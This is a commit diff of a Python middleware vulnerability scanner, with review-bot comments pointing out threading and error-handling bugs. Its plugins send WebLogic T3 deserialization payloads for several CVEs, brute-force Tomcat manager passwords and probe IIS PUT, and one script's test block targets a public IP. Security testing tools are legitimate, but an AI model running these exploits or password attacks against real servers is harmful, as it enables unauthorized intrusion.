This commit is contained in:
nihaohello
2019-03-31 15:47:11 +08:00
parent 1d17b331e6
commit 71670dcad6
33 changed files with 190 additions and 113 deletions


@@ -4,18 +4,20 @@
#blog:http://www.youknowi.xin
import sys
import os
import re
import argparse
import traceback
import config
import multiprocessing
from concurrent.futures import ThreadPoolExecutor
from plugins import plugins
#80,4848,7001,7002,8000,8001,8080,8081,8888,9999,9043,9080
class MiddlewareScan(object):
def __init__(self,arg,ThreadNum):
def __init__(self,arg,config):
self.arg=arg
self.ThreadNum=ThreadNum
self.config=config
def run(self):
P = plugins.plugins(self.arg,self.ThreadNum)
P = plugins.plugins(self.arg,self.config)
P.run()
def main():
arg = argparse.ArgumentParser(description='MiddlewareScan By Naivete')
@@ -24,31 +26,44 @@ def main():
arg.add_argument('-p', '--options', help='options', dest='options')
arg.add_argument('-t', '--thread', help='thread num', dest='thread')
arg = arg.parse_args()
if len(sys.argv)<=2:
os.system("python "+sys.argv[0]+" -h")
exit()
print("开始检测中间件相关漏洞:")
if arg.thread:
config.ThreadNum=arg.thread
if not arg.options:
arg.options="all"
if arg.url:
if not re.match(r'^https?:/{2}\w.+$', url):
print("输入标准的url如:http://www.baidu.com")
exit()
try:
S=MiddlewareScan(arg,config)
S.run()
except Exception:
print(traceback.print_exc())
if arg.file:
multiprocessing_list=[]
f = open(arg.file, encoding="utf-8")
for url in f.readlines():
url = url.rstrip("\n")
arg.url = url
if not re.match(r'^https?:/{2}\w.+$', url):
if not url.startswith("http"):
arg.url="http://"+url
S = MiddlewareScan(arg, config)
multiprocessing_list.append(S.run())
f.close()
pool=multiprocessing.Pool(config.Process)
try:
with open(arg.file,encoding="utf-8") as f:
with ThreadPoolExecutor(config.ThreadNum) as excetor:
for url in f.readlines():
try:
url=url.rstrip("\n")
S=MiddlewareScan(arg,config)
excetor.submit(S.run())
except Exception:
pass
f.close()
#pool.apply_async(multiprocessing_list)
for i in multiprocessing_list:
pool.apply_async(i)
pool.close()
pool.join()
except Exception:
print(traceback.print_exc())
print("\n\n相关漏洞检测完成。")
if __name__ == '__main__':
print("开始检测中间件相关漏洞:")
main()
main()
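Review bot: `excetor.submit(S.run())` inside the `ThreadPoolExecutor` block runs the scan synchronously on the main thread and hands the executor its return value (`None`), so each pooled task is `None()` and the pool adds no concurrency; it should be `excetor.submit(S.run)`. The `except Exception: pass` around that loop body then hides both the resulting `TypeError` and any real scan failure, and because `-t` is added without `type=int`, `config.ThreadNum=arg.thread` leaves a string that `ThreadPoolExecutor(config.ThreadNum)` rejects at construction — `config.ThreadNum = int(arg.thread)` (or `type=int` on the option) fixes that, whether or not those lines are new here. In the `if arg.url:` branch the regex is applied to `url`, which is not bound there (only `arg.url` is); if that line is on the new side it is a `NameError` outside any try. `main()` begins in the first hunk of this section, and the same call-now-instead-of-pass-the-callable mistake recurs with `threading.Thread(...)` in the tomcat and weblogic plugin sections below.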

Binary file not shown.


@@ -1,4 +1,5 @@
ThreadNum=50
Process=30
Timeout=6
port=80
#linux


@@ -38,5 +38,8 @@ def IIS_shortname_Scanner(url):
except Exception as e:
raise Exception('[is_vul.Exception] %s' % str(e))
def IIS_special_plugin_(arg,config):
IIS_PUT(arg,config)
IIS_shortname_Scanner(arg.url)
try:
IIS_PUT(arg,config)
IIS_shortname_Scanner(arg.url)
except Exception:
pass
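Review bot: The new `except Exception: pass` in `IIS_special_plugin_` discards the error that `IIS_shortname_Scanner` deliberately re-raises as `'[is_vul.Exception] %s'` just above it, and because both calls share one try, a failure inside `IIS_PUT` also skips the shortname check entirely. Give each call its own try and report the exception so a broken check is distinguishable from a clean target. The same silencing is introduced in the `special_plugin_` hunk further down, where `print(e)` is replaced by `pass`.
```python
def IIS_special_plugin_(arg,config):
    try:
        IIS_PUT(arg,config)
    except Exception as e:
        print("IIS_PUT 脚本出错: %s" % e)
    try:
        IIS_shortname_Scanner(arg.url)
    except Exception as e:
        print("IIS_shortname_Scanner 脚本出错: %s" % e)
```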

0
plugins/__init__.py Normal file

Binary file not shown.


@@ -22,7 +22,7 @@ def special_plugin_(arg,config):
try:
thread.start()
except Exception as e:
print(e)
pass
for t in threads:
t.join()


@@ -6,6 +6,7 @@ import uuid
from termcolor import cprint
from urllib.parse import urlparse
from concurrent.futures import ThreadPoolExecutor
import threading
def requests_post(url,username,password,flag_list):
try:
login_url = url + '/manager/html'
@@ -79,6 +80,14 @@ class Exploit:
cprint("[-] " + __file__ + "====>连接超时", "cyan")
def tomcat_special_plugin_(arg,config):
Exploit().attack(arg.url)
crack_password(arg,config)
threads=[]
threads.append(threading.Thread(Exploit().attack(arg.url)))
threads.append(threading.Thread(crack_password(arg,config)))
for thread in threads:
try:
thread.start()
except Exception:
pass
for j in threads:
j.join()
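Review bot: `threading.Thread(Exploit().attack(arg.url))` and `threading.Thread(crack_password(arg,config))` call the scan functions immediately on the calling thread, outside the try, and pass their return value as the Thread's first positional parameter (`group`); the threads that are then started and joined execute nothing, so the `except` around `thread.start()` never sees a scan error. Pass the callables instead: `threads.append(threading.Thread(target=Exploit().attack, args=(arg.url,)))` and `threads.append(threading.Thread(target=crack_password, args=(arg, config)))`. The `weblogic_special_plugin_` hunk below builds its nine threads the same way.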

File diff suppressed because one or more lines are too long


@@ -17,6 +17,7 @@ PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d
VER_SIG=['weblogic.jms.common.StreamMessageImpl']
def t3handshake(sock,server_addr):
sock.connect(server_addr)
sock.settimeout(7)
sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
time.sleep(1)
sock.recv(1024)
@@ -53,14 +54,17 @@ def checkVul(res,server_addr,index):
# print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
def run(rip,rport,index):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (rip, rport)
t3handshake(sock,server_addr)
buildT3RequestObject(sock,rport)
rs=sendEvilObjData(sock,PAYLOAD[index])
checkVul(rs,server_addr,index)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (rip, rport)
t3handshake(sock, server_addr)
buildT3RequestObject(sock, rport)
rs = sendEvilObjData(sock, PAYLOAD[index])
checkVul(rs, server_addr, index)
except Exception as e:
print("CVE_2016_0638脚本出错")
if __name__=="__main__":
rip = '222.85.76.240'
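Review bot: The new try in `run` catches everything, but the socket created inside it is closed on neither path; `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:` (or a `finally: sock.close()`) keeps each check from leaking a connection, and the `except Exception as e:` branch binds `e` without using it — `print("CVE_2016_0638脚本出错: %s" % e)` would say why it failed. That matters because `t3handshake` sends `'...'.decode('hex')`, which under Python 3 (the file's `print(...)` calls suggest it) raises `AttributeError` on the str before anything is sent, so with the new handler the check always reports the generic error; `bytes.fromhex(...)` is the Python 3 spelling. The `__main__` block keeps a public address on its `rip = ...` line while the sibling scripts use `'127.0.0.1'`; it appears to be context, but a loopback placeholder is the safer thing to leave in the repository. The same unclosed socket and discarded exception are added in the CVE_2016_3510, CVE_2017_3248, CVE_2018_2628 and CVE_2018_2893 hunks, and the generic message without the exception in CVE_2017_3506, managerURL200 and uddi_ssrf.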


@@ -17,6 +17,7 @@ PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d
VER_SIG=['org.apache.commons.collections.functors.InvokerTransformer']
def t3handshake(sock,server_addr):
sock.connect(server_addr)
sock.settimeout(7)
sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
time.sleep(1)
sock.recv(1024)
@@ -53,14 +54,17 @@ def checkVul(res,server_addr,index):
# print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
def run(rip,rport,index):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (rip, rport)
t3handshake(sock,server_addr)
buildT3RequestObject(sock,rport)
rs=sendEvilObjData(sock,PAYLOAD[index])
checkVul(rs,server_addr,index)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (rip, rport)
t3handshake(sock, server_addr)
buildT3RequestObject(sock, rport)
rs = sendEvilObjData(sock, PAYLOAD[index])
checkVul(rs, server_addr, index)
except Exception:
print("CVE_2016_3510脚本出错")
if __name__=="__main__":
rip = '127.0.0.1'


@@ -17,6 +17,7 @@ PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d
VER_SIG=['\\$Proxy[0-9]+']
def t3handshake(sock,server_addr):
sock.connect(server_addr)
sock.settimeout(7)
sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
time.sleep(1)
sock.recv(1024)
@@ -53,14 +54,17 @@ def checkVul(res,server_addr,index):
# print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
def run(rip,rport,index):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (rip, rport)
t3handshake(sock,server_addr)
buildT3RequestObject(sock,rport)
rs=sendEvilObjData(sock,PAYLOAD[index])
checkVul(rs,server_addr,index)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (rip, rport)
t3handshake(sock, server_addr)
buildT3RequestObject(sock, rport)
rs = sendEvilObjData(sock, PAYLOAD[index])
checkVul(rs, server_addr, index)
except Exception:
print("CVE_2017_3246脚本出错")
if __name__=="__main__":
rip = '127.0.0.1'
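Review bot: The new message `print("CVE_2017_3246脚本出错")` names CVE_2017_3246, while the weblogic plugin loader in this commit imports and calls `CVE_2017_3248` and every sibling hunk names itself after its own CVE; if this is the 3248 script, the message should read `print("CVE_2017_3248脚本出错")`. Including the caught exception in that message, as suggested on the CVE_2016_0638 hunk, would also apply here.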


@@ -64,9 +64,12 @@ def poc(url):
result = '[-]目标weblogic未检测到CVE-2017-3506'
return result
def run(rip,rport):
url=rip+':'+str(rport)
result = poc(url=url)
print(result)
try:
url = rip + ':' + str(rport)
result = poc(url=url)
print(result)
except Exception:
print("CVE_2017_3506脚本出错")
if __name__ == '__main__':
run('127.0.0.1',7001)


@@ -20,6 +20,7 @@ VER_SIG=['\\$Proxy[0-9]+']
def t3handshake(sock,server_addr):
sock.connect(server_addr)
sock.settimeout(6)
sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
time.sleep(1)
sock.recv(1024)
@@ -63,15 +64,18 @@ def checkVul(res,server_addr,index):
print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
def run(dip,dport,index):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (dip, dport)
t3handshake(sock,server_addr)
buildT3RequestObject(sock,dport)
rs=sendEvilObjData(sock,PAYLOAD[index])
# print 'rs',rs
checkVul(rs,server_addr,index)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (dip, dport)
t3handshake(sock, server_addr)
buildT3RequestObject(sock, dport)
rs = sendEvilObjData(sock, PAYLOAD[index])
# print 'rs',rs
checkVul(rs, server_addr, index)
except Exception:
print("CVE_2018_2628脚本出错")
if __name__=="__main__":


@@ -21,6 +21,7 @@ VER_SIG=['StreamMessageImpl']
def t3handshake(sock,server_addr):
sock.connect(server_addr)
sock.settimeout(6)
sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
time.sleep(1)
data = sock.recv(1024)
@@ -66,16 +67,18 @@ def checkVul(res,server_addr,index):
print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
def run(dip,dport,index):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (dip, dport)
t3handshake(sock,server_addr)
buildT3RequestObject(sock,dport)
rs=sendEvilObjData(sock,PAYLOAD[index])
#print 'rs',rs
checkVul(rs,server_addr,index)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (dip, dport)
t3handshake(sock, server_addr)
buildT3RequestObject(sock, dport)
rs = sendEvilObjData(sock, PAYLOAD[index])
# print 'rs',rs
checkVul(rs, server_addr, index)
except Exception:
print("CVE_2018_2893脚本出错")
if __name__=="__main__":
# dip = sys.argv[1]
# dport = int(sys.argv[2])


@@ -19,11 +19,14 @@ def islive(ur,port):
return r.status_code
def run(url,port):
if islive(url,port)==200:
u='http://' + str(url)+':'+str(port)+'/console/login/LoginForm.jsp'
print(("[+]目标weblogic控制台地址暴露!\n[+]路径为:{}\n[+]请自行尝试弱口令爆破!".format(u)))
else:
print("[-]目标weblogic控制台地址未找到!")
try:
if islive(url, port) == 200:
u = 'http://' + str(url) + ':' + str(port) + '/console/login/LoginForm.jsp'
print(("[+]目标weblogic控制台地址暴露!\n[+]路径为:{}\n[+]请自行尝试弱口令爆破!".format(u)))
else:
print("[-]目标weblogic控制台地址未找到!")
except Exception:
print("managerURL200脚本出错")
if __name__=="__main__":
url = sys.argv[1]


@@ -20,10 +20,14 @@ def islive(ur,port):
return r.status_code
def run(url,port):
if islive(url,port)==200:
print(('[+]目标weblogic存在UDDI组件!\n[+]路径为:{}\n[+]请自行验证SSRF漏洞!'.format('http://' + str(url)+':'+str(port)+'/uddiexplorer/')))
else:
print("[-]目标weblogic UDDI组件默认路径不存在!")
try:
if islive(url, port) == 200:
print(('[+]目标weblogic存在UDDI组件!\n[+]路径为:{}\n[+]请自行验证SSRF漏洞!'.format(
'http://' + str(url) + ':' + str(port) + '/uddiexplorer/')))
else:
print("[-]目标weblogic UDDI组件默认路径不存在!")
except Exception:
print("uudi_ssrf脚本出错")
if __name__=="__main__":
url = sys.argv[1]


@@ -8,44 +8,62 @@ from plugins.weblogic_poc import CVE_2018_2628
from plugins.weblogic_poc import CVE_2018_2893
from plugins.weblogic_poc import managerURL200
from plugins.weblogic_poc import uddi_ssrf
import threading
import socket
def weblogic_special_plugin_(arg,config):
port=7001
ip=socket.gethostbyname(arg.url.strip("http://").strip("https://"))
threads=[]
threads.append(threading.Thread(CVE_2015_4852.run(ip,port)))
threads.append(threading.Thread(CVE_2016_0638.run(ip,port,0)))
threads.append(threading.Thread(CVE_2016_3510.run(ip,port,0)))
threads.append(threading.Thread(CVE_2017_3248.run(ip,port,0)))
threads.append(threading.Thread(CVE_2017_3506.run(ip,port)))
threads.append(threading.Thread(CVE_2018_2893.run(ip,port,0)))
threads.append(threading.Thread(CVE_2018_2628.run(ip,port,0)))
threads.append(threading.Thread(managerURL200.run(ip,port)))
threads.append(threading.Thread(uddi_ssrf.run(ip,port)))
#print(arg.url)
try:
CVE_2015_4852.run(ip,port)
for thread in threads:
thread.start()
for j in threads:
j.join()
'''
try:
threads[0].strat()
except Exception:
print("CVE_2015_4852 脚本出错")
try:
CVE_2016_0638.run(ip,port,0)
threads[1].start()
except Exception:
print("CVE_2016_0638 脚本出错")
try:
CVE_2016_3510.run(ip,port,0)
threads[2].start()
except Exception:
print("CVE_2016_3510 脚本出错")
try:
CVE_2017_3248.run(ip,port,0)
threads[3].start()
except Exception:
print("CVE_2017_3248 脚本出错")
try:
CVE_2017_3506.run(ip,port)
threads[4].start()
except Exception:
print("CVE_2017_3506 脚本出错")
try:
CVE_2018_2893.run(ip,port,0)
threads[5].start()
except Exception:
print("CVE_2018_2893 脚本出错")
try:
CVE_2018_2628.run(ip,port,0)
threads[6].start()
except Exception:
print("CVE_2018_2628 脚本出错")
try:
managerURL200.run(ip,port)
threads[7].start()
except Exception:
print("managerURL200 脚本出错")
try:
uddi_ssrf.run(ip,port)
threads[8].start()
except Exception:
print("uddi_ssrf 脚本出错")
print("uddi_ssrf 脚本出错")
'''
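Review bot: The triple-quoted block from the `'''` after the join loop to the closing `'''` is not a comment but a string expression evaluated on every call; since the per-check try/except it holds is superseded by the thread loop above it, delete it rather than keep it as dead text (it also carries the `threads[0].strat()` typo). Separately, `arg.url.strip("http://").strip("https://")` treats its argument as a set of characters, so a host name that begins or ends with any of `h`, `t`, `p`, `:` or `/` (e.g. one ending in `.net`) is truncated before `gethostbyname`; `urllib.parse.urlparse(arg.url).hostname` yields the host directly, and that resolution also sits outside the try, so a DNS failure aborts the plugin with a traceback. That line appears to be context rather than new in this hunk.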

4
test.py Normal file

@@ -0,0 +1,4 @@
import re
url="https://baidu.comas.as"
if re.match(r"{2}\w.+$", url):
print("aaaaaaa")
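Review bot: `re.match(r"{2}\w.+$", url)` raises `re.error: nothing to repeat` because the pattern opens with a quantifier — the scanner's own pattern is `^https?:/{2}\w.+$`, where `{2}` follows the `/` — so this script fails before printing anything. It reads as a scratch check for that regex; either leave it out of the commit or turn it into a real assertion against the scanner's pattern, e.g. `assert re.match(r'^https?:/{2}\w.+$', url)`.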